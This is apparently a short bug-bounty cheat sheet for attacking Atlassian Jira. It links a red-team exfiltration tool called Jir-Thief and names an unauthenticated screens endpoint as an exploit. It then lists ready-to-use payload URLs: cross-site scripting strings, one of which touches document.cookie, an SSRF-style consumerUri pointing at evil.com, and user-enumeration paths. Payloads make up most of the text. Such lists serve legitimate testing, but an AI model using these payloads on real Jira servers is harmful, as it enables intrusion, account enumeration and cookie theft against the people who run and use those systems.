Jir-Thief
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
Jira Unauthenticated Access to Screens
Exploit:
jira.example.com/rest/api/2/screens
Note:
Depends on the Program, some accept it and some consider this Informational.
#jira #bugbounty
Atlassian Jira Payloads
/secure/QueryComponent!Default.jspa
/secure/ViewUserHover.jspa
/ViewUserHover.jspa?username=Admin
/rest/api/2/dashboard?maxResults=100
/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm
/rest/api/2/user/picker?query=admin
/plugins/servlet/oauth/users/icon-uri?consumerUri=https://evil.com
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=SearchConfigurePortalPages.jspa
/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
/secure/ConfigurePortalPages!default.jspa?view=popular
/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
/secure/ContactAdministrators!default.jspa
#bugbounty #jira #payloads